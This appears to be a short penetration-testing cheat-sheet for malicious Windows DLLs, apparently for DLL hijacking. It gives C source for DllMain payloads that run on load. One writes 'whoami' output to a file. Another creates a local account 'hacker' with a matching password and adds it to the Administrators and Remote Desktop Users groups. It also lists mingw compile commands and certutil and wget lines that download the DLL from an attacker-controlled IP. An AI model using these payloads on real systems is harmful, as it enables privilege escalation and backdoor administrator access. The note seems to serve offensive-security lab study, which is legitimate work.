windows_dll.c
setup
code
windows_dll.c
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("whoami > C:\\temp\\message.txt");
ExitProcess(0);
}
return TRUE;
}
windows_dll.c
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k net user hacker hacker /add");
system("cmd.exe /k NET LOCALGROUP 'Administrators' hacker /ADD");
system("cmd.exe /k NET LOCALGROUP 'Remote Desktop Users' hacker /ADD");
ExitProcess(0);
}
return TRUE;
}
compile
deliver
certutil -urlcache -f http://192.168.45.171/windows.dll windows.dll
wget http://192.168.45.171/windows.dll -O windows.dll
other
- poc
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
- For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- source: https://github.com/sagishahar/scripts